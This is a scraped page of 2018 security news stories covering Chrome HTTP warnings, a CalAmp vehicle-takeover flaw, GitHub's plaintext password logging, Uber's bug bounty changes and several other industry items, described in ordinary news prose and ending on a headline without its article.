- Security -

Last update 09.10.2017 13:17:23

Introduction  List  Kategorie  Subcategory 0  1  2  3  4  5  6  7  8 



Chrome evolves security indicators by marking with a red warning for HTTP content
20.5.2018 securityaffairs Security

Starting with Chrome 70, Google will mark with a red warning for HTTP content, Big G is continuing its effort to make the web more secure.
Since January 2017, Chrome indicates connection security with an icon in the address bar labeling HTTP connections to sites as non-secure, while since May 2017 Google is marking newly registered sites that serve login pages or password input fields over HTTP as not secure.

Back to the present, in May 2018 the overall encrypted traffic for several Google products is more than over 93%.

“Security is a top priority at Google. We are investing and working to make sure that our sites and services provide modern HTTPS by default. Our goal is to achieve 100% encryption across our products and services. The chart below shows how we’re doing across Google.” reads the Google Transparency report.

This is an important success for Google, consider that early 2014 only 50% of the traffic was encrypted.

According to the Google Transparency report, around 75% of the pages loaded via Chrome early May 2018 were served over secure HTTPS connections, while in 2014 the percentage was only around 40%.

Given now plan to mark unencrypted connections with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” reads a blog post published by Google.

Chrome 70 treatment for HTTP pages with user input

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities — so don’t wait to migrate to HTTPS! Check out our set-up guides to get started.” explained Emily Schechter, Product Manager, Chrome Security”


Chrome to Issue Red "Not Secure" Warning for HTTP
19.5.2018 securityweek  Security

Google is putting yet another nail in the HTTP coffin: starting with Chrome 70, pages that are not served over a secure connection will be marked with a red warning.

The search giant has been pushing for an encrypted web for many years, and suggested in 2014 that all HTTP sites be marked as insecure.

Google proposed that Chrome would initially mark HTTP pages serving password fields or credit card interactions as “Not Secure,” and only then move to marking all of them in a similar manner.

Now, Google believes that the Chrome security indicators should evolve in line with a wider adoption of HTTPS across the Internet.

At the beginning of May 2018, over 93% of the traffic across Google resources was being served over an encrypted connection, a major improvement since early 2014, when only 50% of the traffic was encrypted.

Similar advancements were observed across the web as well, where around three quarters of the pages loaded via Chrome at the end of last week were served over HTTPS. Three years ago, only around 40% of the loaded pages were using HTTPS.

Given the wider adoption of HTTPS, Google is now ready to make another push towards eliminating unencrypted connections by marking HTTP pages with a red “Not Secure” warning.

“Previously, HTTP usage was too high to mark all HTTP pages with a strong red warning, but in October 2018 (Chrome 70), we’ll start showing the red “not secure” warning when users enter data on HTTP pages,” Emily Schechter, Product Manager, Chrome Security, notes in a blog post.

This, however, is one of the major changes Google is making to Chrome’s security indicators. Thus, Chrome 69 will remove the (green) “Secure” wording and HTTPS scheme in September 2018.

“Users should expect that the web is safe by default, and they’ll be warned when there’s an issue. Since we’ll soon start marking all HTTP pages as ‘not secure’, we’ll step towards removing Chrome’s positive security indicators so that the default unmarked state is secure,” Schechter notes.

Google isn’t the only Internet company to be pushing for the adoption of HTTPS: WordPress started offering free HTTPS to all hosted websites, Let’s Encrypt provides free HTTPS certificates, and Amazon is offering free security certificates to AWS customers.

Starting last year, Firefox too is warning users when webpages are serving login fields over an unsecure, HTTP connection.

As of May 1, Chrome is also displaying a warning when encountering a publicly-trusted certificate (DV, OV, and EV) issued after April 30 that is not compliant with the Chromium Certificate Transparency (CT) Policy.

“We hope these changes continue to pave the way for a web that’s easy to use safely, by default. HTTPS is cheaper and easier than ever before, and unlocks powerful capabilities -- so don’t wait to migrate to HTTPS,” Schechter concludes.


Misconfigured CalAmp Server Enabled Vehicle Takeover
19.5.2018 securityweek  Security

A misconfigured server operated by CalAmp, a company offering the backend for a broad range of well-known car alarm systems, provided anyone with access to data and even allowed for account and vehicle takeover.

The issue was discovered by security researchers Vangelis Stykas and George Lavdanis, while looking for issues in the Viper SmartStart system, which allows users to remotely start, lock, unlock, or locate their vehicles directly from their smartphones.

The researchers discovered that the application uses a SSL connection and uses SSL pinning to prevent tampering.

However, the application also connected to the Calamp.com Lender Outlook service, where login was possible using the credentials from the Viper app.

“This was a different panel which seemed to be targeted to the companies that have multiple sub-accounts and a lot of vehicles so that they can manage them,” Stykas notes.

While everything on the domain was correctly secured, the researchers then discovered that the reports were delivered by another server running tibco jasperreports software. After removing all parameters there, the researchers discovered they were logged in as a user with limited rights but with access to a variety of reports.

“We had to run all those reports for our vehicles right? Well the ids for the user was passed automatically from the frontend but now we had to provide them from the panel as an input. And…well...we could provide any number we wanted,” the researcher explains.

The server not only provided access to all the reports for all the vehicles, including location history, but also included data sources with usernames (although the passwords were masked). Furthermore, the server allowed for the copying and editing of existing reports, meaning that an attacker could add arbitrary XSS to steal information.

With all production databases present on the server, including CalAmp connect device outlook, the researchers then discovered that it was possible to take over a user account via the mobile application, as long as an older password for the account was known. From the application, it is then possible to manipulate the connected device, in this case a vehicle.

Basically, an attacker who knows an old password for an account can change the current password to the old one, then simply walk to the car, unlock it, start the engine, and possibly steal the vehicle.

The vulnerability also allows an attacker to retrieve a list of all users and location reports on users, or start a vehicle’s engine whenever they want. They could also “get all the IoT devices from connect database or reset a password there and start poking around,” the researcher notes.

The researchers reported the issue to CalAmp in the beginning of May 2018, and the company resolved the bug within 10 days of receiving the report. They also updated their website to make it easier for security researchers to report any other vulnerabilities they discover in the company’s products.


F-Secure Unveils New Endpoint Detection & Response Solution
19.5.2018 securityweek  Security

Finland-based cybersecurity firm F-Secure on Thursday announced the launch of a new endpoint detection and response (EDR) solution that combines human expertise and artificial intelligence.

The new offering, F-Secure Rapid Detection & Response, is designed to help organizations protect their IT systems against targeted attacks.

The solution leverages lightweight endpoint sensors and AI-powered data analysis capabilities to monitor devices for malicious activity. Rapid Detection & Response creates a baseline for normal behavior and flags any unusual activity. Suspicious behavior is subjected to additional analysis to prevent false positives that could overwhelm security teams, F-Secure said.

The product can be configured to respond to potential threats in various ways. It can provide guidance to the organization’s IT team or managed service provider on how to respond to an incident, or it can take action automatically in order to contain an attack. More difficult cases can be escalated to a local partner that is trained and supported by F-Secure experts.

Each potential threat is analyzed using a process that F-Secure has named Broad Context Detection, which leverages both human expertise and AI to help organizations validate threats and assess their impact.

F-Secure EDR

“One trick that’s common in modern attacks is to disguise malicious activity as something normal, and attackers are always finding new ways to do this. And since there’s countless numbers of normal things happening in any given environment, it’s basically impossible for companies to rely on human experts or artificial intelligence alone to comb through all that data,” explained F-Secure Chief Technology Officer Mika Stahlberg.

“Artificial intelligence trained by the best cyber security experts is vital when you’re looking for needles in a digital haystack, and in the right hands, it’s able to keep defenders a step ahead of even the most skilled, highly motivated attackers,” Stahlberg added.

F-Secure Rapid Detection & Response is available through the security firm’s network of authorized partners. The solution can be managed directly by an organization’s IT department or it can be used as a managed service from one of F-Secure’s partners.


Behind the Scenes in the Deceptive App Wars
16.5.2018 securityweek  Security

All is not well in the app ecosphere. That ecosphere comprises a large number of useful apps that benefit users, and an unknown number of apps that deceive users. The latter are sometimes described potentially unwanted programs, or PUPs. Both categories need to make money: good apps are upfront with how this is achieved; deceptive apps hide the process.

In recent years there has been an increasing effort to cleanse the ecosphere of deceptive apps. The anti-virus (AV) industry has taken a more aggressive stance in flagging and sometimes removing what it calls PUPs; the Clean Software Alliance (CSA) was founded to help guide app developers away from the dark side; and a new firm, AppEsteem, certifies good apps and calls out bad apps in its ‘Deceptor’ program.

One name figures throughout: Dennis Batchelder. He is currently president of the AV-dominated Anti-Malware Testing Standards Organization (AMTSO); was a leading light in the formation, and until recently a member of the advisory board, of the CSA; and is the founder of AppEsteem.

But there has been a falling out between the CSA and AppEsteem.

The CSA
The CSA was officially launched in the Fall of 2015, although it had already been on the drawing board for over a year. Batchelder was instrumental in getting it started while he was working for Microsoft, where he was director, program management until April 2016.

The CSA was introduced during VB2015 with a joint presentation from Microsoft and Google, demonstrating early support from the industry’s big-hitters.

“As a 501(c)(6) nonprofit trade association,” writes the CSA on its website, “the CSA works to advance the interests of the software development community through the establishment and enforcement of guidelines, policies and technology tools that balance the software industry’s needs while preserving user choice and user control.”

In other words, it seeks to develop an app ecosphere where honest developers can be fairly recompensed, via monetization, for their labor. However, it provides very little information on its website. It does not, for example, list the members of the trade association, nor give any indication on how it will enforce its guidelines and policies on recalcitrant apps.

AppEsteem
Founded by Batchelder in 2016, AppEsteem is primarily an app certification organization – it certifies clean apps. However, since a carrot works best when supported by a stick, AppEsteem also calls out those apps it considers to be deceptive and therefore potentially harmful to users.

Batchelder hoped that the CSA and AppEsteem could work together (he was on the advisory board of the former and is president of the latter). The CSA could provide recommendations and industry support on classification criteria, and AppEsteem – at one step removed – could provide the enforcement element apparently missing in the CSA.

AppEsteem maintains what it calls the ‘deceptor list’; a list of apps that in its own judgement use deceptive means to increase their monetization potential. At the time of writing, there are more than 300 apps on the deceptor list. It also actively encourages AV firms to use this list in their own attempts at blocking PUPs.

There is a difficult balance. Deceptive app developers will object to being included on a public shaming list. Apps that get clean need to be removed in a timely fashion. New methods of deception need to be recognized and included in the bad behavior criteria.

It is, in short, a process wide open for criticism from app developers who are called out.

CSA criticizes AppEsteem
Criticism came last week from an unexpected source – from the CSA. On 10 May 2018, the CSA published a remarkably negative report on AppEsteem’s ‘deceptor’ program titled, CSA Review of AppEsteem Programs. It was, said the CSA, “triggered by a groundswell of complaints and expressions of concern received by the CSA from industry members regarding this program.”

The report is largely – although not entirely – negative. It raises some interesting points. The ‘groundswell of complaints’ is to be expected; particularly from the apps and the app developers called out for being deceptive.

However, concern over some other elements seem valid. AppEsteem does not seem keen to call out AV products, even when they appear to use ‘deceptive’ practices (consider, for example, the ease with which the user can download one product and find that McAfee has also been downloaded).

Furthermore, if certification is annual, a certified app could introduce deceptive practices immediately after certification that would go undetected (would effectively be allowed) for 12 months. “There is no more deceptive or risky behavior than that,” notes the report.

The CSA report makes four proposals. AppEsteem should: refocus efforts on certification; work with the CSA to devise consensus‐built ‘minbar’ criteria; balance violator identification and remediation; and embrace oversight and dispute resolution.

‘Oversight’ implies external management. Refocusing on certification implies abandoning the deceptor app listing. And ‘work with the CSA’ implies that AppEsteem should take its direction from the CSA. If not quite a power grab, the report attempts to neutralize the enforcement element of AppEsteem.

AppEsteem’s response
AppEsteem’s first response was for Batchelder to resign from the CSA advisory board. “I unable to figure out how to remain on the CSA Advisory Board in good conscience,” he wrote to the CSA. “Which sucks, as I’ve pushed for CSA to get operational and remain relevant, sent potential members its way, and worked hard to help it succeed. But being an advisor of an incorporator-status organization who is conducting a ‘confidential’ investigation into AppEsteem’s certification program without involving AppEsteem makes no sense at all.”

AppEsteem’s second response was to establish CleanApps.org; which is effectively an alternative to the CSA. “AppEsteem needs CSA,” comments one source who asked to be anonymous, “or at least some organization that can provide guidelines and some kind of oversight of what AppEsteem is doing… It seems that this new player is in fact a company created by Dennis trying to get rid of CSA.”

That partly makes sense. If AppEsteem cannot work with the CSA, it must find a similar organization it can work with. “After I disengaged from CSA, Batchelder told SecurityWeek, “we realized that AppEsteem had to find a way to get the vendor voice and to reassure them that we’re doing things fairly (the stuff we had hoped CSA would do). So, I incorporated CleanApps.org and recruited its first board from some of our customers (I know, it’s like a soap opera), and then resigned/handed it over once the board launched. Our goal is that once CleanApps.org launches, we’ll give them insight into our operations.”

To the CSA, he wrote in February, “I wanted to let you know that we have determined that it’s in best interests of both ourselves, our customers, and the vendor community if we had oversight and a ‘voice’ specifically representing the vendor community… We won’t become a member or hold any position in CleanApps.org; they will self-govern.” (He has since made it clear that he does not mean ‘oversight’ in any controlling manner.)

AppEsteem’s position seems to be that the app ecosphere requires three organizations: AppEsteem to enforce good behavior among the app developers; the CSA to represent the market in which apps operate; and CleanApps to represent the apps and app developers.

But it is clearly concerned over the current relevance of the CSA. “I think the biggest hole with CSA,” Batchelder told SecurityWeek, “is that they never finished forming: it’s still just… as the only member, and what we felt was that when [that member] had an issue with us, CSA went negative… it’s problematic to us that they’re not formed after four years.”

If AppEsteem needs something like the CSA to be effective, the CSA needs something like AppEsteem to be relevant.

AppEsteem’s third response is a short blog posted on the same day as CSA published its report – Thursday, 10 May 2018. There is no indication of any rapprochement with the CSA. “But we also want to be clear,” writes the author: “if you think it’s fine to treat consumers as exploitable targets for deceptive and aggressive software, we totally understand your desire for us to leave you alone. We strongly suggest you either get on board or find something else to do with your time, as we’re going to continue to tune our Deceptor program to find even more effective ways to disrupt your ability to hurt consumers.”

The way forward
It is hard to see how any outright deceptive app produced by developers simply out to get as much money as possible will ever be persuaded by force of argument alone to abandon deceptive practices. This seems to be the approach of the CSA; and it appears – on the evidence of its website – to have achieved little in its three to four years of existence.

Indeed, the one and only report the CSA has published is the report criticizing AppEsteem. Before that, the previous publication seems to be ‘update #7’, probably written around March 2016.

If the CSA has achieved anything, it is not saying so. At the very least, it could be urged to be more transparent in its operations and achievements – even a list of members would be useful.

Meantime, if the new CleanApps.org gathers pace and support, the CSA itself will become increasingly irrelevant in the battle against deceptive apps; that is, potentially unwanted programs.


Some Firefox Screenshots End Up Publicly Accessible
16.5.2018 securityweek  Security

Mozilla’s Firefox browser allows users to take screenshots of entire pages or sections of pages and save them to the cloud, and these could end up accessible to everyone, an ethical hacker has discovered.

Introduced in the browser last fall, Firefox Screenshots was meant to make it easy for users to “take, download, collect and share screenshots.” To access it, one would have to click on the Page actions menu in the address bar (or simply right-click on a web page) and select Take a Screenshot.

This allows users to save a screenshot of the entire page, of the visible section of the page, or use a selection tool to save only a region they consider important. Next, they can dismiss the action, copy the screenshot, download it, or click a “Save” button that sends the screenshot to the cloud.

All saved screenshots go to https://screenshots.firefox.com, a default setting in the browser. Furthermore, all screenshots that have been previously shared to public forums are indexed by search engines such as Google and could be discovered and accessed by anyone.

Screenshots are sent to the public server only when the user clicks the “Save” button. Many users, however, might have been long doing so without realizing that they were actually sending them to the cloud.

Firefox screenshots can end up publicly exposed

Mozilla issued a fix for the issue yesterday, soon after details on it emerged on Twitter. Apparently, this is not the first time the organization attempts to address this, but the previous implementation was flawed.

Specifically, in its attempt to avoid shot pages being indexed by search engines, Mozilla replaced robots.txt with <meta name=robots value=noindex>, but the fix was “only put in place for expired pages instead of all pages as intended.”

“So this is being deployed and now we're talking to DDG/Google etc to strip the domains,” John Gruen, UX-focused Product Manager at Mozilla, told the ethical hacker who discovered the flaw.

Updated: A previous version of this article incorrectly stated that all screenshots end up being publicly accessible.


Microsoft Adds Support for JavaScript in Excel—What Could Possibly Go Wrong?
11.5.2018 thehackernews Security

Shortly after Microsoft announced support for custom JavaScript functions in Excel, someone demonstrated what could possibly go wrong if this feature is abused for malicious purposes.
As promised last year at Microsoft's Ignite 2017 conference, the company has now brought custom JavaScript functions to Excel to extend its capabilities for better work with data.
Functions are written in JavaScript for Excel spreadsheets currently runs on various platforms, including Windows, macOS, and Excel Online, allowing developers to create their own powerful formulae.
But we saw it coming:

Security researcher Charles Dardaman leveraged this feature to show how easy it is to embed the infamous in-browser cryptocurrency mining script from CoinHive inside an MS Excel spreadsheet and run it in the background when opened.
"In order to run Coinhive in Excel, I followed Microsoft’s official documentation and just added my own function," Dardaman said.
Here is an official documentation from Microsoft to learn how to run custom JavaScript functions in Excel.
But... JavaScript for Excel Poses Less Threat—Here's Why?

However, it should be noted that Excel add-ins, the APIs which are responsible for running the JavaScript custom functions, don’t execute by default immediately after opening the JS-embedded spreadsheet.
Instead, users need to manually load and run JavaScript functions through the Excel add-ins feature for the first time, and later it will get executed automatically every time the Excel file is opened on the same system.
Moreover, when you explicitly try to run a JavaScript function in Excel sheet that connects to an external server, Microsoft prompts the user to allow or deny the connection, preventing unauthorized code from executing.
Therefore, JavaScript for Excel does not pose much threat today, unless and until someone finds a way around to execute it automatically without requiring any user interaction.
Besides this, Microsoft has also confirmed that Excel add-ins currently rely on a hidden browser process to run asynchronous custom functions, but in the future, it will run JavaScript directly on some platforms to save memory.
For now, JavaScript custom functions for Excel has been made available in Developer Preview edition for Windows, Mac, iPads and Excel Online only to Office 365 subscribers enrolled in the MS Office Insiders program.
Microsoft will soon roll this feature out to a broader audience.


Firefox 60 Brings Support for Enterprise Deployments
10.5.2018 securityweek Security

Released on Wednesday, Firefox 60 allows IT administrators to customize the browser for employees, and is also the first browser to feature support for the Web Authentication (WebAuthn) standard.

The new application release also comes with various security patches, on-by-default support for the latest draft TLS 1.3, redesigned Cookies and Site Storage section in Preferences, and other enhancements.

To configure Firefox Quantum for their organization, IT professionals can either use Group Policy on Windows, or a JSON file that works across Mac, Linux, and Windows operating systems, Mozilla says. What’s more, enterprise deployments are supported for both the standard Rapid Release (RR) of Firefox or the Extended Support Release (ESR), which is now version 60.

While the standard Rapid Release automatically receives performance improvements and new features on a six-week basis, the Extended Support Release usually receives the features in a single update per year. Critical security updates are delivered to both releases as soon as possible.

Mozilla has published the necessary information for IT professionals to get started with using Firefox Quantum in their organization on this site.

The WebAuthn standard allows end users to use a single device to log into their accounts without typing a password. The feature is available only on websites that have adopted the standard and can also be used as a secondary authentication after entering a password.

“Essentially, WebAuthn is a set of anti-phishing rules that uses a sophisticated level of authenticators and cryptography to protect user accounts. It supports various authenticators, such as physical security keys today, and in the future mobile phones, or biometric mechanisms such as face recognition or fingerprints,” Mozilla explains.

One of the first major web services to have adopted the standard is Dropbox, which announced on Wednesday that WebAuthn is now supported as a two-step verification.

Firefox 60 also brings along patches for over two dozen security vulnerabilities, including two memory safety bugs rated Critical severity.

The latest version of the browser patches 6 High severity flaws, namely use-after-free with SVG animations and clip paths, use-after-free with SVG animations and text paths, same-origin bypass of PDF Viewer to view protected PDF files, insufficient sanitation of PostScript calculator functions in PDF viewer, integer overflow and out-of-bounds write in Skia, and uninitialized memory use by WebRTC encoder.

A total of 14 Medium severity flaws were addressed in the new release (including one that only affects Windows 10 users running the April 2018 update or later), alongside 4 Low risk issues.


Amazon Introduces AWS Security Specialty Certification Exam
4.5.2018 securityweek  Security

Security professionals looking to demonstrate and validate their knowledge of how to secure the Amazon Web Services (AWS) platform can now do so by taking the new AWS Certified Security – Specialty exam.

Intended for individuals who hold either an Associate or Cloud Practitioner certification, the security exam covers a broad range of areas, including incident response, logging and monitoring, infrastructure security, identity and access management, and data protection.

Individuals interested in taking the exam should have at least five years of IT security experience designing and implementing security solutions, Amazon says. At least two years of hands-on experience securing AWS workloads is also recommended.

By taking the exam, candidates validate their ability to demonstrate and understand specialized data classifications and AWS data protection mechanisms, as well as data encryption methods and secure Internet protocols, along with AWS mechanisms to implement them.

The exam also allows candidates to demonstrate working knowledge of AWS security services and features of services to provide a secure production environment, and competency gained from two or more years of production deployment experience using AWS security services and features.

The candidates would also show an ability to make tradeoff decisions with regard to cost, security, and deployment complexity given a set of application requirements, and would demonstrate an understanding of security operations and risk.

In addition to announcing the AWS Certified Security – Specialty exam, Amazon also published training and other resources that would help candidates prepare for the exam (focused on AWS fundamentals, architecture, security operations, and security services).

There are also a couple of AWS whitepapers candidates are encouraged to glance over (Security and Compliance documentation and Compliance resources), as well as exam preparation resource guides they can take advantage of.

The Speciality exam includes 65 questions, should take around 170 minutes to complete, and is in English. Candidates are required to pay a $300 fee to participate.


Industry CMO on the Downstream Risks of "Logo Disclosures"
4.5.2018 securityweek  Security

Cybersecurity Marketing Teams Would Benefit From an Ethics Desk

Jennifer Leggio, chief marketing officer at Flashpoint, is an executive with more than a decade's experience in managing corporate cyber security marketing at the highest levels -- much of the time seeking and advocating a greater ethical stance in marketing. At last month's Hack in the Box Conference in Amsterdam, she delivered a keynote presentation entitled, 'A Risk Assessment of Logo Disclosures'.

The basic premise is that failures in the coordinated approach to vulnerability disclosures can seem attractive from an initial marketing perspective, but are damaging to both the industry and its users. The ultimate problem comes from the different missions between security product development and sales teams: the first is purposed to reduce harm, while the latter is purposed to sell product.

In between these teams sit the researchers, whose function is to find weaknesses in security products so that they can be strengthened, and their users better protected. Researchers wish to have their expertise acknowledged, while developers wish to fix their products securely. Between them they have evolved the process known as coordinated disclosure: researchers report their findings to the developer who fixes the faults, and both coordinate simultaneous disclosure of the vulnerability and its fix.

Logos for VulnerabilitiesIt's a process -- when it works -- that ensures the developer fixes the product as rapidly as possible, while the vulnerability does not become a zero-day exploit for use by cybercriminals, overseen by a CERT 'referee'. The problem comes from undue pressure from marketers, possibly supported by the firm's business leaders. This is the subject of Leggio's keynote presentation: the violation of disclosure process to try to diminish competitors, sell more product, or unethically highlight research prowess.

It's a complex issue because it cuts both ways. Research firms, probably at the behest of marketing, can disclose vulnerabilities ahead of coordination to maximize the publicity of their discovery (and therefore, their visible expertise). Similarly, developers can usurp the agreed coordination date to get fixes out before there is any indication that there was a vulnerability, thereby minimizing any perceived product weakness and negative criticism.

Both have possibly happened in recent months. On March 13, a virtually unknown Israeli firm announced the existence of 13 flaws in AMD chips, after giving AMD just 24 hours to fix them. "It very much felt like a marketing stunt," Leggio told SecurityWeek.

Two days later, Trail of Bits blogged that they had earlier been retained by CTS to confirm the existence of the AMD flaws -- which they did -- but commented, "Our recommendation to CTS was to disclose the vulnerabilities through a CERT." CTS did not follow this advice. This allowed the controversial company Viceroy Research to publish a statement on the same day as CTS disclosed the vulnerabilities:

"These findings demonstrate that AMD’s key products, and it basis for profitability and growth, the EPYC and Ryzen processors, contain severe and pervasive security flaws that put users and organizations at an unacceptable and damaging risk."

This statement bears all the hallmarks of an attempt to short AMD stock. In January, Moneyweb had described Viceroy Research as a "three-man firm... headed by a previous social worker and two Australian youngsters." It concluded, "there are doubts as to whether Viceroy conducts its own research or if it is merely a front for other investors that seek to avoid the limelight but profit from it."

It is possible, then, that unknown investors immediately attempted to profit from the uncoordinated disclosure -- a perfect example of the downstream risks highlighted by Leggio.

But it's not just the researchers that sometimes break the process. Also in March 2018, Core Security released details of a vulnerability in router manufacturer MikroTik's RouterOS. Core and MikroTik agreed on coordinated disclosure, but just before the agreed date, MikroTik quietly fixed the flaw in an OS update. Whether by design or accident, this allowed the manufacturer to avoid making any disclosure or public recognition of the pre-existing vulnerability.

The risk here is to the end user. Without ever hearing about potential problems, the user can easily assume that there are no problems. It's a false sense of security that is patently dangerous since compromised MikroTik routers are an important part of IoT botnets. According to one firm, compromised MikroTik routers comprised 80% of a botnet (probably Reaper) that was used in a DDoS attack against Dutch financials in January 2018.

It is such downstream risks of upfront marketing-led breaches of the coordinated disclosure process that Leggio discussed in her keynote presentation. Key to her proposal is the introduction of an ethics or 'standards desk' overseeing marketing decisions just as some newspapers have a standards desk overseeing the more contentious news stories.

Marketing teams pushing for external disclosure, she told SecurityWeek, "should have it go through an ethical evaluation to ensure that it's not compromising any bigger picture -- like an LEA investigation -- and/or is not tipping-off a cybercriminal that there might be an exploit in their malware that could help law enforcement. You're basically using coordinated disclosure to help cyber criminals harden their own stuff -- needs to be some review there."

It requires, she added, "a shift in culture and a shift in mindset, making sure that business leaders understand that their sales teams, their marketing teams, their finance teams, their legal teams and so on, are all responsible for making sure that there is an ethical delivery in the message."

Leggio's talk is available in the video below:

 


GitHub urged some users to reset their passwords after accidental recorded them
3.5.2018 securityaffairs Security

GitHub, world’s leading software development platform, forced password reset for some users after the discovery of a problem that caused internal logs to record passwords in plain text.
GitHub urged some users to reset their passwords after a problem caused internal logs to record passwords in plain text.

Some users published on Twitter the communication received via email by the company, the incident was discovered during a regular internal audit.

https://securityaffairs.co/wordpress/wp-content/uploads/2018/05/github-password-reset.jpg

The company immediately clarified that its systems were not hacked and that users’ data are not at risk.

According to GitHub, only a “small number” of users are affected, the company forced them a password reset for their accounts and confirmed to have fixed the problem.

The mail provides details on the problems and explained that user passwords were stored in a secure way.

“GitHub stores user passwords with secure cryptographic hashes (bcrypt). However, this recently introduced bug resulted in our secure internal logs recording plaintext user passwords when users initiated a password reset,” GitHub said.

The company added that the plaintext passwords were only accessible through internal log files accessible to a small portion of its IT staff, they were not publicly available.

github social coding

Back in June 2016, the company adopted a similar measure forcing password reset for its customers after it became aware of unauthorized attempts to access a large number of its accounts.

GitHub accounts could represent a mine of information for attackers, in March 2017 threat actors targeted developers having repositories with a data-stealing malware called Dimnie. The malicious code includes keylogging features and modules that capture screenshots, the attackers were searching something of interest among the huge number of projects hosted on the platform.


GitHub Exposed Passwords of Some Users

2.5.2018 securityweek Security

GitHub has instructed some users to reset their passwords after a bug caused internal logs to record passwords in plain text.

Several users posted screenshots on Twitter of the security-related email they received from GitHub on Tuesday. The company told impacted customers that the incident was discovered during a regular audit.

GitHub claims only a “small number” of users are affected and the issue has been resolved, but impacted individuals will only regain access to their accounts after they reset their password.

“GitHub stores user passwords with secure cryptographic hashes (bcrypt). However, this recently introduced bug resulted in our secure internal logs recording plaintext user passwords when users initiated a password reset,” GitHub said.

The company has assured users that the plaintext passwords were never accessible to the public, other GitHub users, and a majority of GitHub staff. While some staff members could have accessed the logs containing the plaintext passwords, GitHub believes it’s “very unlikely” to have happened.

GitHub has highlighted that its systems have not been hacked or compromised in any way.

This is not the first time the Git repository hosting service has asked users to reset their passwords. Back in mid-2016, the company locked some users out of their accounts after malicious actors had started abusing credentials leaked from other online services to log in to GitHub accounts.

The company announced recently that it paid out a total of $166,495 to security researchers who reported vulnerabilities through its bug bounty program last year.


Amazon Boosts Domain Protections in CloudFront
1.5.2018 securityweek Security

Amazon Web Services (AWS) has unveiled a series of enhancements for the domain protections available in CloudFront, meant to ensure that all requests handled by the service come from legitimate domain owners.

Integrated with AWS, the CloudFront global content delivery network service provides both network and application level protection, scales globally, negotiates TLS connections with high security ciphers, and includes distributed denial of service protections.

As per the AWS Terms of Service, CloudFront customers aren’t allowed to receive traffic for a domain they are not authorized to use, and Amazon disables abusive accounts when it becomes aware of this type of activity. Now, the company is also integrating checks directly into the CloudFront API and Content Distribution service to prevent abusive behavior.

One of the newly announced enhancements affects protections against “dangling” DNS entries, where a customer deletes their CloudFront distribution but leave the DNS still pointing at the service. Such situations are very rare, but some customers do leave their old domains dormant, the company says.

In some of these situations, an abuser could exploit a subdomain. If the customers no longer users the subdomain (although the domain is in use) and it points to a deleted CloudFront distribution, an abuser could register the subdomain and claim traffic that they aren’t entitled to.

“This also means that cookies may be set and intercepted for HTTP traffic potentially including the parent domain. HTTPS traffic remains protected if you’ve removed the certificate associated with the original CloudFront distribution,” Amazon explains.

The best fix is to ensure there are no dangling DNS entries in the first place, and Amazon is already reminding users moving to an alternate domain to delete any DNS entries that may still be pointing at CloudFront. Furthermore, checks in the CloudFront API ensure this kind of domain claiming can’t occur when using wildcard domains.

Courtesy of new enhanced domain protection, CloudFront now also checks the DNS whenever the customer removes an alternate domain. Thus, if the service determines that the domain is still pointing at a CloudFront distribution, the API call will fails and other accounts can’t claim the traffic.

Amazon is also planning improved protections against domain fronting, a technique where “a non-standard client makes a TLS/SSL connection to a certain name, but then makes a HTTPS request for an unrelated name.” It basically means routing application traffic to mask its destination.

While such behavior is normal and expected in some circumstances – browsers re-use persistent connections for domain listed in the same SSL certificate –, some use the method to evade restrictions and block imposed at the TLS/SSL layer. However, the technique can’t be used to impersonate domains and the clients are non-standard and working around the usual TLS/SSL checks.

“Although these cases are also already handled as a breach of our AWS Terms of Service, in the coming weeks we will be checking that the account that owns the certificate we serve for a particular connection always matches the account that owns the request we handle on that connection. As ever, the security of our customers is our top priority, and we will continue to provide enhanced protection against misconfigurations and abuse from unrelated parties,” Amazon says.

Threat actors have been observed using domain fronting to hide malicious traffic, the same as legitimate communication services looking to bypass censorship.

Several weeks ago, news broke that Google is making changes to its infrastructure to no longer support domain fronting (which was never officially supported, it seems). According to Access Now, many human rights-enabling technologies relying on Google’s commitment to protecting human rights could be affected by the change.


Uber Updates Bug Bounty Program
30.4.2018 securityweek Security

Uber updates bug bounty program

Uber last week updated the legal terms of its bug bounty program and provided guidance for good faith vulnerability research. The changes come just months after the ride-sharing giant admitted paying a couple of individuals as part of an effort to cover up a massive security incident.

Uber says it has addressed nearly 200 flaws for which it has awarded more than $290,000 since August 2017, bringing the total paid out by the company since the launch of its bug bounty program to over $1.4 million.

The new terms provide more specific guidance on what is and what is not acceptable conduct in terms of vulnerability research. Bug bounty hunters are now also provided clearer instructions on what to do if they come across user data during their investigations.

Researchers acting in good faith are informed that Uber will not initiate or recommend legal action against them. Furthermore, if a third party files a lawsuit, the company has promised to let them know that the activities were conducted in compliance with its program.

These changes are similar to ones announced recently by Dropbox, which has promised “to not initiate legal action for security research conducted pursuant to the policy, including good faith, accidental violations.”

These updates come just months after Uber admitted suffering a data breach that resulted in the information of 57 million riders and drivers, including 25 million individuals located in the United States, being taken from the company’s systems in 2016.

Uber’s security team was contacted in November 2016 by an individual who claimed to have accessed Uber data and demanding a six-figure payment. This individual and an accomplice had found the data in an Amazon Web Services (AWS) S3 bucket used for backup purposes.

After confirming the claims, the ride-sharing firm decided to pay the hackers $100,000 through its HackerOne-based bug bounty program to have them destroy the data.

Uber CISO John Flynn admitted during a Senate hearing in February that it was wrong not to disclose the breach earlier, and admitted that the company should not have used its bug bounty program to deal with extortionists.

On its HackerOne page, Uber now tells researchers, “Don’t extort us. You should never illegally or in bad faith leverage the existence of a vulnerability or access to sensitive or confidential information, such as making extortionate demands or ransom requests or trying to shake us down. In other words, if you find a vulnerability, report it to us with no conditions attached.”

A code of conduct added by HackerOne to its disclosure guidelines shortly after news broke that Uber used the platform to pay off hackers includes an entry on extortion and blackmail, prohibiting “any attempt to obtain bounties, money or services by coercion.” It’s unclear if the code of conduct came in response to the Uber incident, but the timing suggested that it may have been.

Uber typically pays between $500 and $10,000 for vulnerabilities found in resources covered by its bug bounty program, but the company has paid out up to $20,000 for serious issues.

Uber has informed white hat hackers that they can now earn an additional $500 if their vulnerability report includes a “fully scripted” proof-of-concept (PoC).

The company also announced the launch of a pilot program in which bounties donated to a charity through HackerOne will be matched. Donations will initially be matched up to a total of $100,000, but the program may be expanded once that milestone is reached.


Western Digital Cloud Storage Device Exposes Files to All LAN Users
27.4.2018 securityweek  Security

